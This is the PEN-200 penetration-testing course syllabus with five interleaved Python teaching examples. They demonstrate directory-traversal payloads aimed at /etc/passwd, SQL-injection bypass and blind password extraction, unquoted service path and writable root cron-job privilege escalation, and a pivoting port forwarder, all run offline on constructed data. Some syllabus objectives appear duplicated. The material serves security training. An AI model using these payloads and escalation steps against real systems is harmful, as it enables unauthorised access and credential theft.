PEN-200 (PWK) Syllabus
PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved.

Each Learning Module is divided into Learning Units, and each Learning Unit lists the Learning Objectives it covers.

Learning Module: Penetration Testing with Kali Linux: General Course Introduction

  Welcome to PWK
    ● Take inventory over what's included in the course
    ● Set up an Attacking Kali VM
    ● Connect to and interact over the PWK VPN
    ● Understand how to complete Module Exercises

  How to Approach the Course
    ● Conceptualize a learning model based on increasing uncertainty
    ● Understand the different learning components included in PEN-200

  Summary of PWK Learning Modules
    ● Obtain a high level overview of what's covered in each PEN-200 Learning Module

Learning Module: Introduction to Cybersecurity

  The Practice of Cybersecurity
    ● Recognize the challenges unique to information security
    ● Understand how "offensive" and "defensive" security reflect each other
    ● Begin to build a mental model of useful mindsets applicable to information security

  Threats and Threat Actors
    ● Understand how attackers and defenders learn from each other
    ● Understand the differences between risks, threats, vulnerabilities, and exploits
    ● List and describe different classes of threat actor
    ● Recognize some recent cybersecurity attacks

  The CIA Triad
    ● Understand why it's important to protect the confidentiality of information
    ● Learn why it's important to protect the integrity of information
    ● Explore why it's important to protect the availability of information

  Security Principles, Controls, and Strategies
    ● Understand the importance of multiple layers of defense in a security strategy
    ● Describe threat intelligence and its applications in an organization
    ● Learn why access and user privileges should be restricted as much as possible
    ● Understand why security should not depend on secrecy
    ● Identify policies that can mitigate threats to an organization
    ● Determine which controls an organization can use to mitigate cybersecurity threats

  Cybersecurity Laws, Regulations, Standards, and Frameworks
    ● Gain a broad understanding of various legal and regulatory issues surrounding cybersecurity
    ● Understand different frameworks and standards that help organizations orient their cybersecurity activities

  Career Opportunities in Cybersecurity
    ● Identify career opportunities in cybersecurity

Learning Module: Effective Learning Strategies

  Learning Theory
    ● Understand the general state of our understanding about education and education theory
    ● Understand the basics of memory mechanisms and dual encoding
    ● Recognize some of the problems faced by learners, including "The Curve of Forgetting" and cognitive load

  Unique Challenges to Learning Technical Skills
    ● Recognize the differences and advantages of digital learning materials
    ● Understand the challenge of preparing for unknown scenarios
    ● Understand the potential challenges of remote or asynchronous learning

  OffSec Methodology
    ● Understand what is meant by a Demonstrative Methodology
    ● Understand the challenge of preparing for unknown scenarios
    ● Understand the potential challenges of remote or asynchronous learning

  Case Study: chmod -x chmod
    ● Review a sample of learning material about the executable permission, expand beyond the initial information set, and work through a problem
    ● Understand how OffSec's approach to teaching is reflected in the sample material

  Tactics and Common Methods
    ● Learn about Retrieval Practice
    ● Understand Spaced Practice
    ● Explore the SQ3R and PQ4R Method
    ● Examine the Feynman Technique
    ● Understand the Leitner System

  Advice and Suggestions on Exams
    ● Develop strategies for dealing with exam-related stress
    ● Recognize when you might be ready to take the exam
    ● Understand a practical approach to exams

  Practical Steps
    ● Create a long term strategy
    ● Understand how to use a time allotment strategy
    ● Learn how and when to narrow your focus
    ● Understand the importance of a group of co-learners and finding a community
    ● Explore how best to pay attention and capitalize on our own successful learning strategies

Learning Module: Report Writing for Penetration Testers

  Understanding Note-Taking
    ● Review the deliverables for penetration testing engagements
    ● Understand the importance of note portability
    ● Identify the general structure of pentesting documentation
    ● Choose the right note-taking tool
    ● Understand the importance of taking screenshots
    ● Use tools to take screenshots

  Writing Effective Technical Penetration Testing Reports
    ● Identify the purpose of a technical report
    ● Understand how to specifically tailor content
    ● Construct an Executive Summary
    ● Account for specific test environment considerations
    ● Create a technical summary
    ● Describe technical findings and recommendations
    ● Recognize when to use appendices, resources, and references

Learning Module: Information Gathering

  The Penetration Testing Lifecycle
    ● Understand the stages of a Penetration Test
    ● Learn the role of Information Gathering inside each stage
    ● Understand the differences between Active and Passive Information Gathering

  Passive Information Gathering
    ● Understand the two different Passive Information Gathering approaches
    ● Learn about Open Source Intelligence (OSINT)
    ● Understand Web Server and DNS passive information gathering

  Active Information Gathering
    ● Learn to perform Netcat and Nmap port scanning
    ● Conduct DNS, SMB, SMTP, and SNMP Enumeration
    ● Understand Living off the Land Techniques

Learning Module: Vulnerability Scanning

  Vulnerability Scanning Theory
    ● Gain a basic understanding of the Vulnerability Scanning process
    ● Learn about the different types of Vulnerability Scans
    ● Understand the considerations of a Vulnerability Scan

  Vulnerability Scanning with Nessus
    ● Install Nessus
    ● Understand the different Nessus Components
    ● Configure and perform a vulnerability scan
    ● Understand and work with the results of a vulnerability scan with Nessus
    ● Provide credentials to perform an authenticated vulnerability scan
    ● Gain a basic understanding of Nessus Plugins

  Vulnerability Scanning with Nmap
    ● Understand the basics of the Nmap Scripting Engine (NSE)
    ● Perform a lightweight Vulnerability Scan with Nmap
    ● Work with custom NSE scripts

Learning Module: Introduction to Web Applications

  Web Application Assessment Methodology
    ● Understand web application security testing requirements
    ● Learn different types of methodologies of web application testing
    ● Learn about the OWASP Top 10 and most common web vulnerabilities

  Web Application Assessment Tools
    ● Perform common enumeration techniques on web applications
    ● Understand Web Proxies theory
    ● Learn how Burp Suite proxy works for web application testing

  Web Application Enumeration
    ● Learn how to debug Web Application source code
    ● Understand how to enumerate and inspect Headers, Cookies, and Source Code
    ● Learn how to conduct API testing methodologies

  Cross-Site Scripting (XSS)
    ● Understand Cross-Site Scripting vulnerability types
    ● Exploit basic Cross-Site Scripting
    ● Perform Privilege Escalation via Cross-Site Scripting

Learning Module: Common Web Application Attacks

  Directory Traversal
    ● Understand absolute and relative paths
    ● Learn how to exploit directory traversal vulnerabilities
    ● Use encoding for special characters

  File Inclusion Vulnerabilities
    ● Learn the difference between File Inclusion and Directory Traversal vulnerabilities
    ● Gain an understanding of File Inclusion vulnerabilities
    ● Understand how to leverage Local File Inclusion (LFI) to obtain code execution
    ● Explore PHP Wrapper usage
    ● Learn how to perform Remote File Inclusion (RFI) attacks

  File Upload Vulnerabilities
    ● Understand File Upload Vulnerabilities
    ● Learn how to identify File Upload vulnerabilities
    ● Explore different vectors to exploit File Upload vulnerabilities

  Command Injection
    ● Learn about command injection in web applications
    ● Use operating system commands for OS command injection
    ● Understand how to leverage command injection to gain system access

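The three Directory Traversal objectives above, worked through in Python as an added example (this is not PEN-200 course code). The document root `/var/www/html`, the probe paths and the "strip `../` once" filter are constructed assumptions. The block resolves request paths exactly as a file-serving handler would, without touching the filesystem, and shows why single and double URL-encoding and `....//` sequences defeat a filter that only removes the literal `../`, while a resolve-then-check-prefix control rejects all of them.

```python
"""Directory traversal: how '../' and its encodings escape a web root.

Added example, not PEN-200 course code. WEB_ROOT, the request paths and the
'naive_filter' mitigation are constructed assumptions; nothing is read from
disk, the functions only resolve paths the way a file-serving handler would.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root of the target application


def decode_like_server(user_path: str) -> str:
    """Percent-decode twice, as a proxy + application pair often ends up doing.

    That second decode is what turns %252e%252e%252f into ../ after a filter
    that only inspected the once-decoded form has already approved the request.
    """
    return unquote(unquote(user_path))


def naive_filter(user_path: str) -> str:
    """A common broken mitigation: strip the literal '../' once, non-recursively."""
    return user_path.replace("../", "")


def vulnerable_resolve(user_path: str) -> str:
    """Join the user-controlled path onto WEB_ROOT with no containment check.

    posixpath.join discards WEB_ROOT entirely when the input is absolute, and
    normpath happily walks above the root, so '../../../etc/passwd' becomes
    '/etc/passwd'.
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, decode_like_server(user_path)))


def safe_resolve(user_path: str) -> Optional[str]:
    """Resolve first, then require the result to stay under WEB_ROOT.

    Returns the resolved path, or None when the request must be rejected.
    Checking the normalized result (not the raw input) is what makes this
    robust against every encoding trick handled by decode_like_server().
    """
    decoded = decode_like_server(user_path)
    if "\x00" in decoded:  # NUL truncates paths in some C-backed runtimes
        return None
    # Strip leading slashes so an absolute request cannot replace WEB_ROOT.
    target = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    if target != WEB_ROOT and not target.startswith(WEB_ROOT + "/"):
        return None
    return target


if __name__ == "__main__":
    probes = [
        "images/logo.png",
        "../../../etc/passwd",
        "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
        "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd",
        "/etc/passwd",
    ]
    for probe in probes:
        print(f"{probe:60} vulnerable -> {vulnerable_resolve(probe)}")
        print(f"{'':60} filtered   -> {vulnerable_resolve(naive_filter(probe))}")
        print(f"{'':60} safe       -> {safe_resolve(probe)}")
    print("filter bypass:", vulnerable_resolve(naive_filter("....//....//....//etc/passwd")))
```

The point to carry into testing is that any filter must be evaluated on the fully decoded and normalized path; that is also why `safe_resolve()` is the only version that treats a request for `/etc/passwd` as `/var/www/html/etc/passwd` instead of the real file.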
Learning Module: SQL Injection Attacks

  SQL Theory and Database Types
    ● Refresh SQL theory fundamentals
    ● Learn different DB types
    ● Understand different SQL syntax

  Manual SQL Exploitation
    ● Manually identify SQL injection vulnerabilities
    ● Understand UNION SQLi payloads
    ● Learn about Error SQLi payloads
    ● Understand Blind SQLi payloads

  Manual and Automated Code Execution
    ● Exploit MSSQL Databases with xp_cmdshell
    ● Automate SQL Injection with SQLmap

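The Manual SQL Exploitation objectives (UNION and Blind payloads) and the parameterized fix, worked through against an in-memory SQLite database. This is an added example, not course material: the schema, the users, the password `s3cret` and the `api_keys` table are constructed, and SQLite stands in for the MySQL and MSSQL back ends the module uses, so `xp_cmdshell` and Error-based payloads are out of scope here.

```python
"""SQL injection worked through against an in-memory SQLite database.

Added example, not PEN-200 course code. The schema, the users and their
passwords, and the api_keys table are constructed for this demo; SQLite
stands in for the MySQL/MSSQL back ends the module targets, and the payloads
use only portable syntax (quotes, UNION, SUBSTR, -- comments).
"""
import sqlite3
import string
from typing import Dict, List, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed sample data: two users and a table the app never exposes."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('admin', 's3cret'), ('bob', 'hunter2');
        CREATE TABLE api_keys (id INTEGER PRIMARY KEY, api_key TEXT);
        INSERT INTO api_keys (api_key) VALUES ('AKIA-CONSTRUCTED-EXAMPLE');
        """
    )
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """String-concatenated query: attacker input becomes part of the SQL grammar."""
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return con.execute(query).fetchone() is not None


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the same input is only ever a bound string value."""
    row = con.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def search_vulnerable(con: sqlite3.Connection, term: str) -> List[Tuple]:
    """Two-column search. A UNION payload must supply exactly two columns."""
    query = f"SELECT id, username FROM users WHERE username LIKE '%{term}%'"
    return con.execute(query).fetchall()


def blind_extract(con: sqlite3.Connection, scalar_sql: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction of a scalar sub-select, one character at a time.

    The only oracle is whether login_vulnerable() succeeds: a true injected
    condition logs us in as admin, a false one does not. scalar_sql is something
    like "SELECT password FROM users WHERE username='admin'".
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in string.printable:
            if ch == "'":  # would need escaping inside our own string literal
                continue
            # "-- " comments out the trailing "AND password = '...'" clause.
            payload = f"admin' AND SUBSTR(({scalar_sql}),{pos},1)='{ch}'-- "
            if login_vulnerable(con, payload, "irrelevant"):
                recovered += ch
                break
        else:
            break  # no candidate matched: we have walked past the last character
    return recovered


def demo() -> Dict[str, object]:
    """Run every payload against a fresh database and collect the outcomes."""
    con = build_db()
    return {
        "auth_bypass": login_vulnerable(con, "admin'-- ", "wrong"),
        "tautology": login_vulnerable(con, "nobody", "' OR '1'='1"),
        "union_rows": search_vulnerable(con, "' UNION SELECT id, api_key FROM api_keys-- "),
        "blind_admin_password": blind_extract(
            con, "SELECT password FROM users WHERE username='admin'"),
        "safe_bypass_attempt": login_safe(con, "admin'-- ", "wrong"),
        "safe_real_login": login_safe(con, "admin", "s3cret"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:22} {value}")
```

The blind loop is the part worth internalizing: with no data returned, one true/false observation per request is still enough to read any scalar the database user can select, and it is exactly what SQLmap automates with timing and error channels as well.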
Learning Module: Client-Side Attacks

  Target Reconnaissance
    ● Gather information to prepare client-side attacks
    ● Leverage client fingerprinting to obtain information

  Exploiting Microsoft Office
    ● Understand variations of Microsoft Office client-side attacks
    ● Install Microsoft Office
    ● Leverage Microsoft Word Macros

  Abusing Windows Library Files
    ● Prepare an attack with Windows library files
    ● Leverage Windows shortcuts to obtain code execution

Learning Module: Locating Public Exploits

  Getting Started
    ● Understand the risk of executing untrusted exploits
    ● Understand the importance of analyzing the exploit code before execution

  Online Exploit Resources
    ● Access multiple online exploit resources
    ● Differentiate between various online exploit resources
    ● Understand the risks associated with online exploit resources
    ● Use Google search operators to discover public exploits

  Offline Exploit Resources
    ● Access Multiple Exploit Frameworks
    ● Use SearchSploit
    ● Use Nmap NSE Scripts

  Exploiting a Target
    ● Follow a basic penetration test workflow to enumerate a target system
    ● Completely exploit a machine that is vulnerable to public exploits
    ● Discover appropriate exploits for a target system
    ● Execute a public exploit to gain a limited shell on a target host

Learning Module: Fixing Exploits

  Fixing Memory Corruption Exploits
    ● Understand high-level buffer overflow theory
    ● Cross-compile binaries
    ● Modify and update memory corruption exploits

  Fixing Web Exploits
    ● Fix Web application exploits
    ● Troubleshoot common web application exploit issues

Learning Module: Antivirus Evasion

  Antivirus Evasion Software Key Components and Operations
    ● Recognize known vs unknown threats
    ● Understand AV key components
    ● Understand AV detection engines

  AV Evasion in Practice
    ● Understand antivirus evasion testing best practices
    ● Manually evade AV solutions
    ● Leverage automated tools for AV evasion

Learning Module: Password Attacks

  Attacking Network Services Logins
    ● Attack SSH and RDP Logins
    ● Attack HTTP POST login forms

  Password Cracking Fundamentals
    ● Understand the fundamentals of password cracking
    ● Mutate Wordlists
    ● Explain the basic password cracking methodology
    ● Attack password manager key files
    ● Attack the passphrase of SSH private keys

  Working with Password Hashes
    ● Obtain and crack NTLM hashes
    ● Pass NTLM hashes
    ● Obtain and crack Net-NTLMv2 hashes
    ● Relay Net-NTLMv2 hashes

Learning Module: Windows Privilege Escalation

  Enumerating Windows
    ● Understand Windows privileges and access control mechanisms
    ● Obtain situational awareness
    ● Search for sensitive information on Windows systems
    ● Find sensitive information generated by PowerShell
    ● Become familiar with automated enumeration tools

  Leveraging Windows Services
    ● Hijack service binaries
    ● Hijack service DLLs
    ● Abuse Unquoted service paths

  Abusing other Windows Components
    ● Leverage Scheduled Tasks to elevate our privileges
    ● Understand the different types of exploits leading to privilege escalation
    ● Abuse privileges to execute code as privileged user accounts

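The unquoted service path objective above as an added example (not course code). `hijack_candidates()` reproduces the prefix-by-prefix lookup CreateProcess performs on an unquoted ImagePath that contains spaces; the service table and the writable-directory list are constructed stand-ins for the `wmic service get name,pathname,startmode` and `icacls` output gathered during enumeration, and the code assumes the ImagePath holds only the executable (no trailing arguments).

```python
"""Unquoted service path: which files Windows would try before the real binary.

Added example, not PEN-200 course code. The service table and the set of
directories our low-privileged user can write to are constructed stand-ins
for the output of `wmic service get name,pathname,startmode` and
`icacls <dir>` on a target. The parsing assumes the ImagePath holds only the
executable path (no trailing arguments), which is the case the module exploits.
"""
import ntpath
from typing import Dict, Iterable, List


def hijack_candidates(image_path: str) -> List[str]:
    """Return the paths CreateProcess tries, in order, before the intended executable.

    For  C:\\Program Files\\My App\\bin\\service.exe  Windows first tries
    C:\\Program.exe, then C:\\Program Files\\My.exe, then the real file. A quoted
    path, or a path without spaces, is parsed unambiguously and yields nothing.
    """
    path = image_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if not ntpath.splitext(prefix)[1]:  # no extension: Windows appends .exe
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def _normalize_dir(d: str) -> str:
    return d.rstrip("\\").lower()


def exploitable_paths(image_path: str, writable_dirs: Iterable[str]) -> List[str]:
    """Candidates we could actually plant: their parent directory is writable by us."""
    writable = {_normalize_dir(d) for d in writable_dirs}
    return [c for c in hijack_candidates(image_path)
            if _normalize_dir(ntpath.dirname(c)) in writable]


def audit(services: List[Dict[str, str]], writable_dirs: Iterable[str]) -> Dict[str, List[str]]:
    """Map each auto-start service to the paths where a planted binary would run on boot."""
    findings = {}
    for svc in services:
        if svc["start_mode"].lower() != "auto":
            continue  # manual services need a restart we may not be able to trigger
        hits = exploitable_paths(svc["path"], writable_dirs)
        if hits:
            findings[svc["name"]] = hits
    return findings


# Constructed sample: what the enumeration commands above might have returned.
SERVICES = [
    {"name": "BackupAgent", "start_mode": "Auto",
     "path": "C:\\Program Files\\Acme Backup\\Current Version\\agent.exe"},
    {"name": "Spooler", "start_mode": "Auto",
     "path": "C:\\Windows\\System32\\spoolsv.exe"},
    {"name": "VendorUpdater", "start_mode": "Auto",
     "path": "\"C:\\Program Files\\Vendor Tools\\updater.exe\""},
    {"name": "DevHelper", "start_mode": "Manual",
     "path": "C:\\Dev Tools\\helper svc\\helper.exe"},
]
WRITABLE_DIRS = ["C:\\Program Files\\Acme Backup", "C:\\Users\\Public", "C:\\Dev Tools"]


if __name__ == "__main__":
    for name, hits in audit(SERVICES, WRITABLE_DIRS).items():
        print(f"{name}: plant a binary at {hits}")
```

On the target the last step is a real write test (for example `icacls "C:\Program Files\Acme Backup"` showing `(W)` or `(F)` for your group), since `ntpath` here only models the lookup order and cannot see the ACLs.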
Learning Module: Linux Privilege Escalation

  Enumerating Linux
    ● Understand files and user privileges on Linux
    ● Perform manual enumeration
    ● Conduct automated enumeration

  Exposed Confidential Information
    ● Understand user history files
    ● Inspect user trails for credential harvesting
    ● Inspect system trails for credential harvesting

  Insecure File Permissions
    ● Abuse insecure cron jobs to escalate privileges
    ● Abuse insecure file permissions to escalate privileges

  Insecure System Components
    ● Abuse SUID programs and capabilities for privilege escalation
    ● Circumvent special sudo permissions to escalate privileges
    ● Enumerate the system's kernel for known vulnerabilities, then abuse them for privilege escalation

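The two Insecure File Permissions objectives combined in one added example (not course code): a parser for system-crontab lines and `ls -l` output, and the check that ties them together. The crontab and listing are constructed samples; the user and group evaluated against (`www-data`) are assumptions standing in for `id` output on the target.

```python
"""Cron jobs that root runs from files other users can modify.

Added example, not PEN-200 course code. The crontab and `ls -l` output below
are constructed samples standing in for `cat /etc/crontab` and `ls -l` on a
target during manual enumeration. A root-owned job whose script is writable by
our user (directly, via a group we belong to, or by everyone) lets us replace
the script body and wait for the next scheduled run to execute as root.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /var/scripts/user_backups.sh
0 3     * * *   root    /usr/local/bin/cleanup.sh --quiet
* *     * * *   www-data /var/www/html/maintenance.sh
"""

LS_OUTPUT = """\
-rwxrwxrwx 1 root root     221 Mar  3 10:12 /var/scripts/user_backups.sh
-rwxr-xr-x 1 root root     980 Jan 11 09:40 /usr/local/bin/cleanup.sh
-rwxrwxr-x 1 root www-data 412 Feb  2 12:00 /var/www/html/maintenance.sh
"""


@dataclass
class CronJob:
    schedule: str
    user: str
    command: str
    script: str  # the command's executable when it is an absolute path, else ""


def parse_crontab(text: str) -> List[CronJob]:
    """Parse system crontab lines (five schedule fields, user, command)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or a VAR=value assignment
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        command = fields[6]
        first = command.split()[0]
        jobs.append(CronJob(" ".join(fields[:5]), fields[5], command,
                            first if first.startswith("/") else ""))
    return jobs


def parse_ls(text: str) -> Dict[str, Tuple[str, str, str]]:
    """Map path -> (mode string, owner, group) from `ls -l` lines."""
    perms = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 9 and len(parts[0]) == 10:
            perms[parts[-1]] = (parts[0], parts[2], parts[3])
    return perms


def writable_by(mode: str, owner: str, group: str, user: str, groups: Tuple[str, ...]) -> bool:
    """Interpret rwx bits: index 2 = owner write, 5 = group write, 8 = other write."""
    return (mode[8] == "w"
            or (mode[5] == "w" and group in groups)
            or (mode[2] == "w" and owner == user))


def find_root_cron_targets(crontab: str, ls_output: str, user: str = "www-data",
                           groups: Tuple[str, ...] = ("www-data",)) -> List[Tuple[str, str, str]]:
    """Return (script, mode, schedule) for root jobs whose script we can overwrite."""
    perms = parse_ls(ls_output)
    hits = []
    for job in parse_crontab(crontab):
        if job.user != "root" or job.script not in perms:
            continue
        mode, owner, group = perms[job.script]
        if writable_by(mode, owner, group, user, groups):
            hits.append((job.script, mode, job.schedule))
    return hits


if __name__ == "__main__":
    for script, mode, schedule in find_root_cron_targets(CRONTAB, LS_OUTPUT):
        print(f"{mode} {script} runs as root on '{schedule}': overwrite it and wait")
```

The `run-parts` line is deliberately skipped (its first token is `cd`, not a script); on a real target you would list `/etc/cron.hourly` and the other `cron.*` directories with the same permission check, and also look at whether any directory on the job's `PATH` is writable when the command is a bare name.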
Learning Module: Port Redirection and SSH Tunneling

  Port Forwarding with *NIX Tools
    ● Learn about port forwarding
    ● Understand why and when to use port forwarding
    ● Use Socat for port forwarding

  SSH Tunneling
    ● Learn about SSH tunneling
    ● Understand how to perform SSH local port forwarding
    ● Understand how to perform SSH dynamic port forwarding
    ● Understand how to perform SSH remote port forwarding
    ● Understand how to perform SSH remote dynamic port forwarding

  Port Forwarding with Windows Tools
    ● Understand port forwarding and tunneling with ssh.exe on Windows
    ● Understand port forwarding and tunneling with Plink
    ● Understand port forwarding with Netsh

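Port forwarding with *NIX tools and SSH local forwarding reduced to what they actually do: a listener that copies bytes in both directions to a target the client cannot reach directly. This is an added example, not course code, equivalent in spirit to `socat TCP-LISTEN:<lport>,fork TCP:<rhost>:<rport>`; the internal service is a constructed echo server and everything binds to 127.0.0.1 on ephemeral ports so it runs offline.

```python
"""A minimal TCP port forwarder, the thing behind `socat TCP-LISTEN:...,fork TCP:...`
and `ssh -L`.

Added example, not PEN-200 course code. The "internal service" is a constructed
echo server, and both it and the forwarder listen on 127.0.0.1 with ephemeral
ports so the demo runs offline; on an engagement the forwarder would listen on
the pivot host and target an address only the pivot can reach.
"""
import socket
import threading
from typing import Tuple

Addr = Tuple[str, int]


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then propagate the half-close."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client: socket.socket, target: Addr) -> None:
    """One forwarded connection: a fresh upstream socket and a pump in each direction."""
    with client, socket.create_connection(target, timeout=10) as upstream:
        back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
        back.start()
        _pump(client, upstream)
        back.join(timeout=10)


def start_forwarder(target: Addr, listen_host: str = "127.0.0.1") -> Tuple[socket.socket, Addr]:
    """Listen on an ephemeral port and relay every accepted connection to target."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((listen_host, 0))
    listener.listen(16)

    def accept_loop() -> None:
        while True:
            try:
                client, _ = listener.accept()
            except OSError:
                return  # listener closed
            threading.Thread(target=_relay, args=(client, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener, listener.getsockname()


def start_echo_server() -> Tuple[socket.socket, Addr]:
    """Constructed stand-in for the internal service the tunnel should reach."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()


def through_tunnel(payload: bytes) -> bytes:
    """Send payload through forwarder -> echo server and return the full reply."""
    echo_sock, echo_addr = start_echo_server()
    fwd_sock, fwd_addr = start_forwarder(echo_addr)
    try:
        with socket.create_connection(fwd_addr, timeout=10) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # done sending; wait for the echoed reply
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        fwd_sock.close()
        echo_sock.close()


if __name__ == "__main__":
    reply = through_tunnel(b"GET / HTTP/1.0\r\nHost: internal\r\n\r\n")
    print(reply.decode())
```

On a real pivot the listener binds 0.0.0.0 (or the pivot's internal interface) and `target` is the address only the pivot can route to. `ssh -L lport:rhost:rport pivot` is the same relay with the listener on your Kali box and the upstream connection opened by sshd on the pivot, which is why it works even when you cannot drop a binary on the pivot.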
Learning Module: Advanced Tunneling

  Tunneling Through Deep Packet Inspection
    ● Learn about HTTP tunneling
    ● Perform HTTP tunneling with Chisel
    ● Learn about DNS tunneling
    ● Perform DNS tunneling with dnscat

Learning Module: The Metasploit Framework

  Getting Familiar with Metasploit
    ● Set up and navigate Metasploit
    ● Use auxiliary modules
    ● Leverage exploit modules

  Using Metasploit Payloads
    ● Understand the differences between staged and non-staged payloads
    ● Explore the Meterpreter payload
    ● Create executable payloads

  Performing Post-Exploitation with Metasploit
    ● Use core Meterpreter post-exploitation features
    ● Use post-exploitation modules
    ● Perform pivoting with Metasploit

  Automating Metasploit
    ● Create resource scripts
    ● Use resource scripts in Metasploit

Learning Module: Active Directory Introduction and Enumeration

  Active Directory Manual Enumeration
    ● Enumerate Active Directory using legacy Windows applications
    ● Use PowerShell and .NET to perform additional AD enumeration

  Manual Enumeration: Expanding our Repertoire
    ● Enumerate Operating Systems Permissions and logged on users
    ● Enumerate Through Service Principal Names
    ● Enumerate Object Permissions
    ● Explore Domain Shares

  Active Directory Automated Enumeration
    ● Collect domain data using SharpHound
    ● Analyze domain data using BloodHound

Learning Module: Attacking Active Directory Authentication

  Understanding Active Directory Authentication
    ● Understand NTLM Authentication
    ● Understand Kerberos Authentication
    ● Become familiar with cached AD Credentials

  Performing Attacks on Active Directory Authentication
    ● Use password attacks to obtain valid user credentials
    ● Abuse enabled user account options
    ● Abuse the Kerberos SPN authentication mechanism
    ● Forge service tickets
    ● Impersonate a domain controller to retrieve any domain user credentials

Learning Module: Lateral Movement in Active Directory

  Active Directory Lateral Movement Techniques
    ● Understand WMI, WinRS, and WinRM lateral movement techniques
    ● Abuse PsExec for lateral movement
    ● Learn about Pass The Hash and Overpass The Hash as lateral movement techniques
    ● Misuse DCOM to move laterally

  Active Directory Persistence
    ● Understand the general purpose of persistence techniques
    ● Leverage golden tickets as a persistence attack
    ● Learn about shadow copies and how they can be abused for persistence

Learning Module: Assembling the Pieces

  Enumerating the Public Network
    ● Enumerate machines on a public network
    ● Obtain useful information to utilize for later attacks

  Attacking WEBSRV1
    ● Utilize vulnerabilities in WordPress Plugins
    ● Crack the passphrase of an SSH private key
    ● Elevate privileges using sudo commands
    ● Leverage developer artifacts to obtain sensitive information

  Gaining Access to the Internal Network
    ● Validate domain credentials from a non-domain-joined machine
    ● Perform phishing to get access to the internal network

  Enumerating the Internal Network
    ● Gain situational awareness in a network
    ● Enumerate hosts, services, and sessions in a target network
    ● Identify attack vectors in the target network

  Attacking the Web Application on INTERNALSRV1
    ● Perform Kerberoasting
    ● Abuse a WordPress Plugin function for a Relay attack

  Gaining Access to the Domain Controller
    ● Gather information to prepare client-side attacks
    ● Leverage client fingerprinting to obtain information

Learning Module: Trying Harder: The Challenge Labs

  PWK Challenge Lab Overview
    ● Learn about the different kinds of Challenge Labs
    ● Obtain a high level overview of each scenario
    ● Understand how to treat the mock OSCP Challenge Labs

  Challenge Lab Details
    ● Understand how to think about the concept of dependency
    ● Understand the lack of meaning inherent to IP address ordering
    ● Learn about the concept of "decoy" machines
    ● Learn how Routers and Network Address Translation affect the scenarios
    ● Understand how to treat the credentials and password attacks

  The OSCP Exam
    ● Learn about the OSCP Certification Exam Information
